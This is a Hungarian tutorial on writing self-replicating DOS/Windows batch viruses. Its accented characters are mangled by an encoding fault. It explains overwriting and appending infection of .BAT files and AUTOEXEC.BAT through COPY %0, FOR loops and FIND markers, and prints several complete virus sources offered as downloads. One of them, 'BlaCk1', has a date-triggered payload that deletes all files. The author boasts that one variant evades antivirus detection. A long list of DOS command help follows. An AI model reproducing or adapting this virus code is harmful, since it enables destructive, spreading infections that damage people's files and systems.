BATch virii ksztse - 1. rsz

A BAT vrus a lehet&otilde; legegyszer&ucirc;bb a vrusok kzl, csak minimlis programozi
tuds szksges hozz, taln ezrt rendkvl npszer&ucirc; a kezd&otilde;k krben. A BAT
vrusoknak megvan az az el&otilde;nyk, hogy brmilyen, M$ (DOS, WIN3.1, WIN9X,
WIN2000) oprendszeren gy futnak, hogy ihaj, ellenttben a mr kihalflben lv&otilde;
DOS-os vrusokkal, melyek elbuknak a mai vindzos fjlokon. A BAT vrusok ezzel
szemben korltlanul terjednek. A BAT vrust rnak egy dolgot kell a szeme el&otilde;tt
tartani. SZINTE MINDEN GPEN VAN LEGALBB EGY BAT, AZ AUTOEXEC.BAT. Ebben a
fejezetben nem trnk ki kln a BATCH programozs alapjaira, mert akkor nagyon
hossz lenne. Felttelezem, hogy rendelkezel bizonyos BAT-os alapismeretekkel.
De tnyleg csak egy kicsivel... gy prbltam ezt a tutorialt sszehozni, hogy a
legkezdbb kezd is megrtse...
Mieltt brki belekezd, felhvnm a figyelmt, hogy csakis a sajt
felelssgre. az itt tallhat LETLTHET BAT vrusok, kizrlag tant
jellegek. Nem vllalok semmifle felelssget, vagy egyebeket az itt lertakkal
kapcsolatban. A v_ -vel kezdd letlthet llomnyok L VRUSOKAT
tartalmaznak, hasznlatukrt, vagy brmifle krokozsrt szintn nem vllalok
semmifle felelssget. A pl_ kezdet fjlok rtalmatlan pldaprogramokat
tartalmaznak. Szval j tanulst, brmi gond, vagy problma esetn keressetek. A
cmem megtalljtok itt. Ja, s krlek benneteket, tartzkodjatok, a hasonl
jelleg levelektl: rj nekem egy vrust, Vennk egy vrust, stb.
Kszike :)
Akkor vgjunk bele:

Milyen segdprogramok kellenek?
Brmilyen TEXT szvegszerkeszt&otilde; megteszi. DN, NC editor, Wordpad, Jegyzettmb,
ilyesmik.
Vagy, ha mondjuk 8086-os gped van, s mg egy kis bigy sem megy el rajta,
akkor hasznlhatod a
COPY CON filenv
parancsot is. Az is a BAT virii-k egyik j tulajdonsga. DOS3.0-tl felfele
minden gpen elfutnak, fejlesztskhz nincs szksg hatalmas progikra, st, a
fordtssal, s egyebekkel sem kell foglalkozni. Minimlis erforrst
fogyasztanak. Teht kezdknek rendkvl ajnlott...

A Batch nyelvet a M$ fejlesztette, s hasznlta. A BAT fjl egy olyan DOS
script, melyhez vgeredmnyben nem kell fordtprogram, az utastsok sorrl
sorra hajtdnak vgre, egy egyszer&ucirc; TEXT formtum fjlban. A BAT-ban hasznlt
utastsokat a COMMAND.COM rtelmezi, teht felfoghatjuk egy n. realtime, vagy
vals idej&ucirc; fordtprogramnak is, mely a programsorokat a gp ltal rthet&otilde;
nyelvre fordtja. Termszetesen a BAT-bl minden, a Command-line-on vagy
beviteli sorban vgrehajtott utasts is elindthat. Ilyen esetben a BAT mint
egy egyszer&ucirc; Command-line utastssor viselkedik. A programozsi, s
fjlkezelsi, stb. elemek termszetesen keverhet&otilde;k. Program indts, trls,
tnevezs, formattls, dtumfigyels, stb.
A Bat termszetb&otilde;l addan a "programoz" lehet&otilde;sgei is korltozottak. Nem
vgezhet el bonyolult memriakezelsi illetve vltozkat ignyl&otilde; m&ucirc;veleteket,
teht egy BAT vrus MINDG realtime (amikor elindtjk, csak akkor hajtdik
vgre), nem stealth (lopakod), nem kpes megszaktsokat figyelni, vagy magra
lltani, gy pl. arra sem, hogy egyszer&ucirc; msolskor fert&otilde;zzn. BAT vrust csak
az &otilde;t tartalmaz BAT elindtsakor aktivlhatunk.

A legtbb Batch virii nagyon egyszer&ucirc; mdjt hasznlja a terjedsnek. Egyszer&ucirc;en
a %0 (0. paramter = aktulis fjl elrsi tja s neve) segtsgvel sajt
magt, vagyis 1 TELJES BAT-OT tmsolnak a tallt bat tetejbe. Vagyis
fellrjk azt. ezt a copy paranccsal rik el.
Plda:
Copy /Y %0 C:\Autoexec.bat >nul
Nmi magyarzat:
A paramterek vizsglatra nem csak a %0, de a %1, %2, stb. is hasznlhat,
egszen 9-ig. ezek a "vltozk" meghvsa a %-jel segtsgvel trtnik (ahogy a
tbbi is). A %5 teht visszaadja a BAT 5. paramtert. (Ha volt ilyen.)
/Y nem kr beleegyezst fellrskor. (mg szp)
A >nul a copy zeneteit "elhalgatja". Nincs kimenet a kperny&otilde;n. De nem csak a
copy-t, hanem brmely ms DOS-os program kimenett tirnytja a NUL eszkzre,
vagyis sehova. Ha a > jel mell filenevet runk, akkor a kpernyn megjelen
zenetek mind abba a fileba kerlnek. Pl.:
ARJ /? >arjhelp.txt
Ezzel a mdszerrel remekl lehet, mondjuk helpet listzni. Ha a > jelet
megfordtjuk: < -ra, akkor az adatmozgs pont fordtva fog megtrtnni. Ha a
DOS-os progi "jl" van megrva, s hasznl paramtereket az un. DOS PROMPT-bl,
v. COMMAND LINE-bl, akkor a paramtereket egy filebl fogja kiolvasni. Ez
nagyon hasznos hossz paramtersorok ksztsekor, stb... Ha a > jel helyett >>
jelet hasznlunk, a kimeneti fjl, ha ltezik, nem rdik fell, hanem
hozzfzdik.
Most kvetkezzen egy FELLRS BAT VRUS, az els&otilde; vrusom, legalbb is egy
rszlete, a motorja: (Az Fprot Black.A-nak ismeri fel)

@Echo OFF
FOR %%f IN (*.BAT ../*.BAT) DO COPY %0 %%f >nul
Magyarzat:
@Echo off - kikapcsolja a fjl sorainak megjelentst. Ha a sorok elejre @
jelet tesznk, akkor nem kell az ECHO-t belltani, a sor semmikppen nem fog
megjelenni. Az echo-t helyettesthetjk a CTTY NUL-al is, st, ha a sor elejre
@ jelet tesznk, akkor az echo-t akr bkn is hagyhatjuk, mert az gy jellt
sorok automatikusan nem kerlnek kirsra. Az @ jelnek mg ms klnleges
feladata is lesz, de errl majd ksbb. Pl.:
@ECHO Csak a kirs hajtdik vgre, a parancssor nem lthat

Ilyen esetben a @ s az azt kvet parancs kz nem kell sznet. St. Tilos.
Annyit azrt tisztzzunk, hogy a programozs sorn magyar betket kizrlag ECHO
utn lehet hasznlni...

set - Globlis vltoz belltsa. (Ha elfogyott a krnyezeti belltsokhoz
szksges terlet, akkor a BAT vrosk nagy rsze meg van l&otilde;ve.) Pl.:

SET TEMP=C:\WINDOWS\TEMP

(ez a sor lt. minden autoexec-ben benne van.) Ezutn a C:\WINDOWS\TEMP
knyvtrra hivatkozhatunk csak a TEMP szcskval, pl.:

ECHO %TEMP%

Ez a sor megjelenti a TEMP tartalmt, de ugyanezt fjlokkal is eljtszhatjuk:

SET TEMP=C:\WINDOWS\TEMP
SET MYFILE=C:\MYDIR\MYFILE.TXT
ECHO %MYFILE%
COPY /Y %MYFILE% %TEMP%

Ezek a paramcsok persze a COMMAND LINE-ban is mkdnek. Ha brmelyik sort
berjuk, olyan, mintha egy BAT 1 sort hajtannk vgre...
for - Egy nagyon egyszer&ucirc;, m rendkvl hatsos parancs. Minden, a () kztt
deklarlt fjl keresse, melynek eredmnyt a %%f-be teszi. Ami a DO utn jn,
brmilyen utasts lehet, ami vgrehajtdik a tallt fjlokra.
*.bat - aktulis alknyvtrban.
../*.BAT - AUTOEXEC.BAT rulez! :)
Mi a klnbsg a %%f s %%b kztt?
A %%f hasznlatval a DO utni sor minden tallt fjlra vgrehajtdik. REALTIME
A %%b hasznlatval a DO utni sor csak akkor hajtdik vgre, mikor az el&otilde;z&otilde;
fjlm&ucirc;velet befejez&otilde;dtt.
%%f - Bat-okat keres, s minden tallatnl a tallt BAT neve belekerl ebbe a
"vltozba".
Ha a vltoznk tbb mint egy bet, akkor a kvetkez kppen kell hivatkoznunk
r:
%vltoz% vagyis szzalkjelek kz kell zrni. Az egybetsekre a %%bet formt
hasznljuk.
copy... nos, gondolom rthet&otilde;

Nnny rdekes elgaztats a DO utn (IF = HA, program elgaztats):
Hasznlat: IF [felttel] [utasts]

IF %1 ECHO OK -Ha van a fjlnak paramtere, akkor hajtja vgre az ECHO-t.
IF EXIST %1 vagy IF EXIST %%f vagy stb... - Ha az EXIST utn megadott fjl, (ami
lehet vltozban %%-al jellve, vagy paramterben (%) vagy simn is) ltezik
IF NOT EXIST -Az EXIST tagadsa. Ha a megadott fjl nem ltezik. A NOT szcska
minden eldntend&otilde; (boolean: igen/nem) parancs el tve gy mdost, hogy ha
valami nem kvetkezik be, akkor hajtdik vgre az utasts.

A kvetkez&otilde; 2 sorral, DEBUG-olhatunk is:
Letlthet: pl_debug.bat
@Echo OFF
for %%f in (*.bat ../*.bat) do Echo %%f
Magyarzat: A tallt fjlok kirsa.

Kszen is van az els&otilde; BAT vrusunk. De be kell, hogy valljuk, a fellrs nem
egy elegns megolds. Hogyan lehetne a vrust rvenni a hozzf&ucirc;zsre? A megolds
egyszer&ucirc;nek nz ki.
@Echo OFF
FOR %%f IN (*.BAT ../*.BAT) DO COPY %0+%%f %%f>nul
Vagyis: a vrusunk s a tallt BAT sszemsolsa. a sorrend tetsz&otilde;leges, ebben
az esetben a vrus kerl az els&otilde; helyre. Nade. Ez az eljrs a teljes file-t
tmsolja, gy a kvetkez&otilde; fert&otilde;zsnl mr nem csak a vrus, de a fert&otilde;ztt fjl
is msolsra kerl. Pl.:
Mondjuk ez van a fert&otilde;ztt fileban a fert&otilde;zs utn:
@Echo OFF
FOR %%f IN (*.BAT ../*.BAT) DO COPY %%f+%0 %%f>nul
Echo ntympntym
Echo.
Echo Pntymntym
Echo.
REM Ez az n 1. BAT-om
A kvetkez&otilde; fert&otilde;zskor a file mr gy nz ki:
@Echo OFF
FOR %%f IN (*.BAT ../*.BAT) DO COPY %%f+%0 %%f>nul
copy /Y %0 +BlaCk1 BlaCk1
Echo ntympntym
Echo.
Echo Pntymntym
Echo.
REM Ez az n 1. BAT-om
Echo.
Echo ez mr a 2. BAT-om.
Rem Copyright nemcsinloksemmit
REM Ht ez bar
mem /a /c /p
Szval elg kellemetlen. Ezzel a fantasztikus eljrssal hatalmas BAT fjlokat
kszthetnk. Mivel a progi nem ellenrzi, (nem tudja ellenrizni), hogy a
tallt fjl mr fertztt e vagy sem, gy egy fjlt akrhnyszor fellfertzhet.
ez azonban nveli a terjedsi sebessget (hozzfzsnl), mert a virii egy
BAT-ban tbbszr is vgrehajtdik, kivve, ha nem tartalmaz olyan kdot, mely
meglltja a BAT futst. Ilyen utasts pl.: az
EXIT
Amit csak gy "simn" kiadunk, s a BAT-unk mr meg is llt.
FOR %%f IN (*.BAT ../*.BAT) DO COPY %%i+%0 %%i>nul
utastst a kvetkez&otilde;, mg a BAT-os &otilde;skorbl szrmaz 2 sorra is kicserlhetjk,
aminek a legnagyobb htrny az, amir&otilde;l mr szltam, vagyis, ha elfogy a
krnyezeti belltsok trolshoz a mem (rdemesebb a fentit hasznlni):
for %%f in (*.bat ../*.bat) do set BlaCk=%%f
COPY BlaCk+%0 %%f>nul
Most, hogy szinte mindent tudunk a fellr BAT-okrl, most nzzk meg azokat,
amelyek mr tnylegesnek vrusnak nevezhetk. Ezek a nem fellr, vagy ms
nven hozzfz, mdost (batch appender) vrusok. A problma most sem
bonyolultabb mint az elz esetben... A lnyeg az, hogy magunkat egy fjl
vgre, elejre, vagy belsejbe msoljuk. Csak egy klnbsg van. A hordoz BAT
ne kerljn t az jonnan fertztt llomnyba. Hogy lehetne ezt megoldani? Nos,
nagyon egyszeren. Nzzk meg a kvetkez forrst, ami mellesleg az elbb
emltett BAT, fellrs vrusom BLACK.ORIGINAL.B vltozata. (Minden
prblkozsom ellenre, az FPROT mgis, mint BLACK.A ismeri fel... Szar gy. :)
):
for %%f in (*.bat ..\*.bat) do set BlaCk1=%%f
find "BlaCk1" %0 >>%BlaCk1%


Mi az, ami elsre feltnik? Ht kinek mi. De nekem az a bizonyos BlaCk1 szcska.
Furcsa mdon minden sorban ismtldik, s van egy olyan utasts, amivel eddig
mg nem tallkoztunk, a find. A mechanizmus nagyon egyszer. A viriinknek, ha
csak magt akarja tmsolni, ismernie kell a sajt sorait, ezt pedig CSAK gy
rhetjk el, ha a sorok valamiben megegyeznek, gy, hogy az a program futst ne
zavarja. Teht nincs ms htra, mint bevezetni egy krnyezeti vltozt, mondjuk
a BlaCk1-et. Fontos, hogy a betmret minden sorban stimmeljen. A memriabeli
problmkrl mr szltam. Teht ha elfogy a krnyezeti belltsokhoz szksges
terlet, akkor a virii meg van lve.

FIND - utasts. Megnyitja az utna, a 2.paramterben megadott file-t, (%0 =
aktulis fjl, amiben a virii van) ami lehet akr krnyezeti vltoz is, (ezt
ugye tisztztuk.) s az els paramterben megadott szveget, un.: karakterlncot
keresi benne, s a keress eredmnyt egy globlis vltozba, az ERRORLEVEL-be
teszi, akrcsak az sszes tbbi parancs. Ha az utols parancs elvgzse sikeres
volt, az ERRORLEVEL=0. Ha nem, akkor egy hibakd, vagy 1, de mindenkppen
nagyobb mint 0. A harmadik paramter, a <<%BlaCk1% azokat a sorokat, melyeknen a
keresend karakterlnc megtallhat,  a %BlaCk1% fjlhoz fzi (< esetn
fellrja). A FIND parancsrl rdemes helpet krni, tanulmnyozni, ugyanis a
tallt sorokat a kpernyn jelenti meg (magt a vrust), s csak ezen
kpernyre trtn kirst irnytjuk t, a tallt bat file-ra. A fenti esetben
nem trtnik ellenrzs azt illeten, hogy a file mr fertztt e. Nzzk
ugyanezen forrs kicsit bvtett vltozatt:

for %%f in (*.bat ..\*.bat) do set BlaCk1=%%f
find "BlaCk1" %BlaCk1% >nul
if errorlevel 1 find "BlaCk1"<%0.BAT>>%BlaCk1%

Az ERRORLEVEL a FIND esetben akkor 1, ha a keresett szveg a fileban nem
tallhat. Hogy elkerljk, hogy nem fertztt fjlok esetleg tartalmazzk a mi
vrusunk NEVT, prbljunk meg kis-, nagy betkbl, szmokbl s egyb
karakterekbl ll nevet kitallni.
Teht, ha a vrusunk nincs benne a tallt fjlban, akkor megfertzzk, SZINTN A
FIND UTASTSSAL, teht attl fggen, hogy a kimenetet hova irnytjuk, a FIND
utasts nagyon fontos szerepet tlt be.
IF ERRORLEVEL 1 - Ha hiba volt, akkor az 1-es utn lv utasts vgrehajtdik.

Teht: a vrus minden sornak tartalmazni kell a "nevt". Most lssunk erre egy
pldt. Mondjuk a BlaCk2 varins j is lesz erre a clra. Kln erre a clra
kszlt, ha rengedtek egy vrusrtt, az mg nem ismeri. Mg azt sem mondja r,
hogy ismeretlen vrus. Klnlegessge, hogy NEM rja fell az eredeti
BLACK1.A-t, (Letlthet innen) s nem "annyira" destruktv. Aki a BLACK1.A-t
szeretn tanulmnyozni, az vrjon a kvetkez szmig, klnben kellemetlen
meglepetsben lehet rsze, mikor belenz...Szval a BLACK1.B:
Letlthet: v_black2.bat

@Echo OFF%[BlaCk1]%
REM Less destructive version of (BlaCk1)! DOES NOT OVERWRITE OLD Black1.
for %%f in (*.bat ..\*.bat) do set BlaCk1=%%f
find "BlaCk1"<%BlaCk1%>nul
if errorlevel 1 find "BlaCk1"<%0>>%BlaCk1%
echo.|date|find "04.16"<nul%[BlaCk1]%
if errorlevel 0 goto :BlaCk1
if errorlevel 1 goto :BlaCk1_KILL
:BlaCk1_KILL
Cls REM BlaCk1
ECHO.Hello! I am the Black Death (BlaCk1) from Hungary! Just a moment...
del /Y *.* [%BlaCk1%]
Echo.Bang! Now you are death! (BlaCk1)
:BlaCk1

Ez a virii, szinte minden eddig tanult dolgot magba foglal. Amirl mg nem
beszltem, az a GOTO utasts:
Brmilyen BAt file belsejben van arra lehetsg, hogy bizonyos rszeket
tugorjunk, teht a sorok nem egyms utn hajtdnak vgre. A label-nek, v.
cmknek nevezett valamiket a :NEV
utastssal hozhatjuk ltre, minden kln magyarzat nlkl (Csak angol betk
lehetnek a nv-ben). Ha az utasts vgrehajts egy ilyen sorhoz r, egyszeren
nem veszi figyelembe, mintha ott sem lenne Az ilyen LABEL-eknek CSAK A GOTO
utastssal van rtelmk. Vagyis:
GOTO :cmke
formban. gy a GOTO s a LABEL kzti rszt tugorja, s a label utn kvetkez
sorban folytatdik a vgrehajts. Termszetesen elre, s htra is
hivatkozhatunk. A kvetkez nhny sor vgtelentve rja a kpernyre, hogy
Black Cat! ( :) az a nyavajs ego...) (megszaktani CTRL+C -vel, vagy
CTRL+BRAKE):
Letlthet: pl_bc.bat
:INDUL
@ECHO BLACK CAT
@GOTO :INDUL
Ennyit a GOTO-rl. Nzztek meg a pldkat, s minden rthetv vlik.
a fent felsorolt dolgok, tulajdonsgok, utastsok, termszetesen vgtelenl
kombinlhatk. az adja meg a BAT virii egyedisgt. Amit itt lertam, az csak
egy lehetsges t. Mg gy is sokminden htra van. Egy BAT virii tbbet tud,
mint azt mi gondolnnk, na de errl ksbb.
Akkor jjjenek a pldk:



Vrusnv: DIRECT.A
Letlthet: v_666.bat

@echo off
@set inf=n
@set infect=n
@if %INF%==Y goto scan
@echo @SET INF=Y >a.666
@echo @call %0.bat >>a.666
@echo @echo Batch virus greets You !>>a.666
@TYPE AUTOEXEC.BAT >>A.666
@COPY A.666 AUTOEXEC.BAT >NUL
@SET INF=Y
:scan
@IF %INFECT%==Y GOTO END
@c:
@cd\
@dir %0.bat /s|find /i "Direct" >c:\a.666
@echo exit >>c:\a.666
@echo @copy %%2\%0.bat c:\ >c:\director.bat
@command <c:\a.666 >nul
@c:
@cd\
@dir /ad /s|find /i "Direct" >a.666
@echo exit >>a.666
@echo @if not exist %%2%0.bat copy c:\%0.bat %%2 >c:\Director.bat
@command < a.666 >nul
@del a.666
@del director.bat
@del %0.bat
@SET INFECT=Y
:END
@echo Good command or file name!



Vrusnv: CODE.B
Letlthet: v_code.bat

@echo off%_CoDe%
if '%1=='Inf goto CoDe_inf
if exist c:\_CoDe.bat goto CoDe_ok
if not exist %0.bat goto CoDe_out
find "CoDe"<%0.bat>c:\_CoDe.bat
:CoDe_ok
for %%a in (*.bat ..\*.bat) do call c:\_CoDe Inf %%a
if errorlevel 1 echo [CoDe] the working one.
goto CoDe_out
:CoDe_inf
find "CoDe"<%2>nul
if errorlevel 1 type c:\_CoDe.bat>>%2
:CoDe_out



FPROT REPORT



Ennyit a pldkrl. Most, hogy mr elvileg sokat tudunk, nzznk nhny egyszer
DOS utastst, melyek szness tehetik BAT-os vrusunkat:

      PARANCSLERS
      ATTRIB
       Fjlattribtumok megjelentse vagy mdostsa

      ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [[meghajt:][tvonal]fjlnv] [/S]

      + Attribtum belltsa
      - Attribtum trlse
      R rsvdett fjlattribtum
      A Archivlt fjlattribtum
      S Rendszer fjlattribtum
      H Rejtett fjlattribtum
      /S A megadott tvonal minden knyvtrban mdostja a fjlokat.
      TYPESzvegfjlok tartalmnak megjelentse

      TYPE [meghajt:][tvonal]fjlnv
      DELEgy vagy tbb fjl trlse

      DEL [meghajt:][tvonal]fjlnv [/P]
      ERASE [meghajt:][tvonal]fjlnv [/P]

      [meghajt:][tvonal]fjlnv A trlend fjlok megadsa. Tbb fjl is
      megadhat helyettest karakterek hasznlatval.
      /P A fjlok trlse eltt megerstst kr.
      MOVEFjlok thelyezse valamint fjlok s knyvtrak tnevezse

      Egy vagy tbb fjlt thelyezshez:
      MOVE [/Y | /-Y] [meghajt:][tvonal]fjlnv1[,...] cl

      Knyvtr tnevezshez:
      MOVE [/Y | /-Y] [meghajt:][tvonal]knyvtrnv1 knyvtrnv2

      [meghajt:][tvonal]fjlnv1 Az thelyezend fjl vagy fjlok nevt
      s helyt adja meg.
      cl A fjl j helyt adja meg. A cl egy meghajt
      betjelt s kettspontot, egy knyvtrnevet
      vagy ezek kombincijt tartalmazhatja. Ha

      egyetlen fjlt helyez t, akkor egy fjlnevet
      is belefoglalhat, ha az thelyezskor a fjlt
      t szeretn nevezni.
      [meghajt:][tvonal]knyvtrnv1 Az tnevezend knyvtrat adja meg.
      knyvtrnv2 A knyvtr j nevt adja meg.

      /Y Elnyomja a knyvtr ltrehozsnak vagy a cl
      fellrsnak megerstst.
      /-Y Kri a knyvtr ltrehozsnak vagy a cl
      fellrsnak megerstst.

      A /Y kapcsol szerepelhet a COPYCMD krnyezeti vltozban.
      Ezt fell lehet brlni a parancssorban a /-Y kapcsolval.
      RENFjl s knyvtr tnevezse

      RENAME [meghajt:][tvonal]fjlnv1 fjlnv2
      REN [meghajt:][tvonal]fjlnv1 fjlnv2

      Megjegyzs: clknt j meghajt vagy elrsi t nem adhat meg.
      DELTREEKnyvtr s a benne lv sszes alknyvtr trlse

      Egy vagy tbb fjl s knyvtr trlshez:
      DELTREE [/Y] [meghajt:]elrsi t [[meghajt:]elrsi t[...]]

      /Y Elnyomja az alknyvtr trlsnek megerstst
      kr szveget.
      [meghajt:]elrsi t a trlend knyvtr nevt adja meg.

      Megjegyzs: A DELTREE parancsot krltekinten kell hasznlni. A megadott
      knyvtrban lv sszes fjl s knyvtr trldik.
      STARTWindows vagy MS-DOS program indtsa.
      START [Belltsok] program [paramterek...]
      START [Belltsok] dokumentum.kiterjeszts
      /m[inimalizlt] Az j program minimalizlt (httrben) futtatsa
      /max[imalizlt] Az j program maximalizlt (eltrben) futtatsa
      /r[elz mret] Az j program elz mretben (eltrben) futtatsa (alap)
      /w[vrakozs]   Nem tr vissza, amg az elindtott progi ki nem lp.
      CALLEgyik parancsfjl (batch fjl) hvsa egy msikbl

      CALL [meghajt:][tvonal]fjlnv [parancsfjl paramterek]

      parancsfjl paramterek A parancsfjl ltal ignyelt
      parancssor-adatok megadsa
      CHOICEVrakozs arra, hogy a felhasznl kivlasszon egyet a
      vlasztkhalmazbl.

      CHOICE [/C[:]vlasztk] [/N] [/S] [/T[:]c,nn] [szveg]

      /C[:]vlasztk Az engedlyezhet billentyket adja meg. Az alaprtelmezs
      IN
      /N A prompt karakterlnc vgn nem jelenti meg a vlasztkot s
      a krdjelet (?).
      /S Kis- s nagybetk megklnbztetse.
      /T[:]c,nn Alaprtelmezett vlaszts nn mp utn.
      szveg A megjelentend karakterlnc

      ERRORLEVEL a megnyomott billenty vlasztkban elfoglalt helye.
      DATEA dtum megjelentse vagy belltsa

      DATE [dtum]

      A mai dtum belltsnak megjelentshez s egy j dtum megadshoz
      rd be paramterek nlkl a DATE parancsot. A dtum megtartshoz nyomja
      meg
      az ENTER billentyt.
      DOSKEYParancssorok szerkesztse, parancssorok jrahvsa s makrk
      ltrehozsa

      DOSKEY [/kapcsol ...] [makrnv=[szveg]]

      /BUFSIZE:mret A makr- s parancspuffermret megadsa (alaprtk:512)
      /ECHO:on|off Be- s kikapcsolja a makrbvtseket (alaprtk:on)
      /FILE:fjl Makrk listjt tartalmaz fjl megadsa
      /HISTORY A memriban trolt parancsok megjelentse
      /INSERT j karakterek beszrsa a sorba gpels kzben
      /KEYSIZE:mret A billentyzetpuffer mretnek belltsa (alaprtk:15)
      /LINE:mret A sorszerkeszt puffer maximlis mrete (alaprtk:128)
      /MACROS Az sszes DOSKey makr megjelentse
      /OVERSTRIKE Az j karakterek fellrsa gpels kzben (alaprtelmezs)
      /REINSTALL A DOSKey j msolatnak teleptse
      makrnv A ltrehozott makr nevnek megadsa
      szveg A makrhoz hozzrendelend parancsok megadsa

      A FEL s LE nyl parancsot hv vissza.
      Az Esc trli az aktulis parancsot.
      Az F7 a korbbi parancsokat jelenti meg.
      Az Alt+F7 trli a korbbi parancsokat.
      [karakterek]F8 A [karakterek] paramterrel kezdd parancsot keresi meg.
      Az F9 a parancsot a szma szerint vlasztja ki.
      Az Alt+F10 trli a makrdefincikat.

      A kvetkez specilis kdokat DOSKey makrdefincikban lehet hasznlni:
      $T Parancselvlaszt: tbb parancs engedlyezse a makrban
      $1-$9 Ktegparamterek: a ktegfjlok %1-%9 paramtereivel ekvivalens.
      $* A kd helyre a parancssorban, a makrnv utn megadott rtk kerl.
      COMMANDElindtja a Windows parancsrtelmez egy j pldnyt.

      COMMAND [[meghajt:]tvonal] [eszkz] [/E:nnnnn] [/L:nnnn] [/U:nnn] [/P]
      [/MSG]
      [/LOW] [/Y [/[C|K] parancs]]

      [meghajt:]tvonal A COMMAND.COM-ot tartalmaz knyvtr megadsa
      eszkz A parancsbemenethez s -kimenethez hasznlt eszkz
      /E:nnnnn A kezd krnyezet mretnek belltsa nnnnn bjtra.
      (az nnnnn 256 s 32768 kztti rtk legyen).
      /L:nnnn A bels pufferhossz mrete (a /P kapcsolval egytt hasznlt)
      (az nnnn 128 s 1024 kztti rtk legyen).
      /U:nnn A bemeneti puffer hossza (a /P kapcsolval egytt hasznlt).
      (az nnn 128 s 255 kztt legyen).
      /P Az j parancssor llandv ttele (nem lehet kilpni).
      /MSG Az sszes hibazenet trolsa a memriban (a /P-vel egytt).
      /LOW A COMMAND rezidens adatai az als memriaterleten maradnak.
      /Y A parancsfjl lptetse a /C vagy a /K kapcsol szerint
      /C parancs Vgrehajtja a megadott parancsot, majd visszatr.
      /K parancs Vgrehajtja a megadott parancsot, s folytatja a futst.
      %TMP% , %TEMP%Krnyezeti vltozk, a TEMP knyvtr helyt adjk meg.
      lt.: C:\WINDOWS\TEMP
      %WINDIR%- Krnyezeti vltoz, a WINDOWS knyvtr helyt adja meg.
      lt.: C:\WINDOWS
      FINDFjlban vagy fjlokban lv szveges karakterlnc keresse

      FIND [/V] [/C] [/N] [/I] "karakterlnc" [[meghajt:][tvonal]fjlnv[
...]]

      /V Az sszes sor megjelentse, amely NEM tartalmazza a karaktereket.
      /C Csak a karaktereket tartalmaz sorok szmnak megjelentse
      /N Sorszm megjelentse a sorok mellett
      /I A kis- s nagybetket nem veszi figyelembe keresskor.
      "karakterlnc"
      A keresend szveges karakterlncot adja meg.
      [meghajt:][tvonal]fjlnv
      A keresend fjl(ok) megadsa

      Ha nincs megadva elrsi t, akkor a FIND a parancssorban bert vagy egy
      msik parancsbl kapcsolt szveget keres.
      IFFeltteles feldolgozs vgrehajtsa parancsfjlban (batch fjl)

      IF [NOT] ERRORLEVEL szm parancs
      IF [NOT] karakterlnc1==karakterlnc2 parancs
      IF [NOT] EXIST fjlnv parancs

      NOT Annak megadsa, hogy a Windows csak hamis llapot esetn
      hajtsa vgre a parancsot
      ERRORLEVEL szm Igaz llapotot eredmnyez, ha az elzleg futtatott
      program a szmnl nagyobb vagy egyenl kilpsi kddal trt vissza.
      parancs Annak a parancsnak a megadsa, amely a felttel teljeslse esetn
      vgrehajtdik.
      karakterlnc==karakterlnc2  Igaz llapotot eredmnyez a megadott
      karakterlncok egyezsge esetn.
      EXIST fjlnv Igaz llapotot eredmnyez, ha a megadott fjl ltezik.
      FORMegadott parancs futtatsa egy fjlhalmaz minden egyes fjljn

      FOR %vltoz IN (halmaz) DO parancs [parancsparamterek]

      %vltoz Cserlhet paramter megadsa
      (halmaz) Fjlhalmazok megadsa. Helyettest karakterek is hasznlhatk.
      parancs A fjlokon vgrehajtott parancsok megadsa parancsparamterek
      A megadott parancs paramtereit vagy kapcsolit adja meg.

      A FOR parancs parancsfjlban a vltozt a %%vltoz szintaxissal kell
      megadni %vltoz helyett.
      SHIFTCserlhet paramterek helynek mdostsa parancsfjlban (batch
fjl)
      PROMPTA Windows parancssort mdostja.

      PROMPT [szveg]

      szveg j parancssor megadsa

      A parancssor norml karakterekbl s az albbi specilis jelekbl llhat:

      $Q = (egyenlsgjel)
      $$ $ (dollrjel)
      $T Aktulis id
      $D Aktulis dtum
      $P Aktulis meghajt s elrsi t
      $V Windows verziszm
      $N Aktulis meghajt
      $G > (nagyobb jel)
      $L < (kisebb jel)
      $B | (fggleges vons)
      $H Backspace (az elz karakter trlse)
      $E Escape kd (27-es ASCII kd)
      $_ Kocsivissza s soremels

      A parancssor alaprtknek visszalltshoz paramterek nlkl rd be a
      PROMPT parancsot.
      DIRKnyvtrban lv fjlok s alknyvtrak listjnak megjelentse

      DIR [meghajt:][elrsi t][fjlnv] [/P] [/W] [/A[[:]attribtumok]]
      [/O[[:]rendezs]] [/S] [/B] [/L] [/V] [/4]

      [meghajt:][tvonal][fjlnv]
      Megadja a listzand meghajtt, knyvtrat, illetve fjlokat.
      (Lehet bvtett fjlmegads vagy tbb fjl megadsa is.)
      /P Vrakozs minden kperny utn
      /W Szles listzsi formtum hasznlata
      /A A megadott attribtum fjl megjelentse
      attribtumok D Knyvtrak R rsvdett fjlok
      H Rejtett fjlok A Archivland fjlok
      S Rendszerfjlok - logikai NEM eltag
      /O A fjlok rendezett sorrend listzsa
      rendezs N Nv szerint (bcrendben)
      S Mret szerint (elbb a kisebbek)
      E Kiterjeszts szerint (bcrendben)
      D Dtum s id szerint (elbb a korbbiak)
      G Elbb a csoportknyvtrak
      - Fordtott sorrend (eltag)
      A A legutbbi hozzfrs szerint (elbb a korbbiak)
      /S Adott knyvtrban s alknyvtraiban lv fjlok megjelentse
      /B Egyszer formtum (fejlc s sszegzs nlkl
      /L Kisbetk hasznlata
      /V Rszletes md
      /4 ngyjegy vszmok (/V -vel egytt hatstalan).

      A DIRCMD krnyezeti vltozban elre be lehet lltani kapcsolkat.
      Az elre belltott kapcsolkat ktjellel (-) lehet fellbrlni;
      pldul: /-W.
      COPYEgy vagy tbb fjl msolsa egy msik helyre

      COPY [/A | /B] forrs [/A | /B] [+ forrs [/A | /B] [+ ...]] [cl]
      [/A | /B]] [/V] [/Y | /-Y]

      forrs A msoland fjl(ok) megadsa
      /A A fjl ASCII szvegfjl
      /B A fjl binris fjl
      cl Az j fjl(ok) knyvtr-, illetve fjlnevnek megadsa
      /V Ellenrzs az j fjlok rsakor
      /Y A megersts kikapcsolsa ltez
      fjlok fellrsakor
      /-Y A megersts bekapcsolsa ltez
      fjlok fellrsakor

      A /Y kapcsolt elre be lehet lltani a COPYCMD krnyezeti vltozban.
      Ez fellbrlhat a parancssorban a /-Y kapcsolval.

      Fjlok hozzfzshez clknt adjon meg egyetlen fjlt, de forrsknt tbb
      fjlt (helyettest karakterek vagy a fjl1+fjl2+fjl3 alak
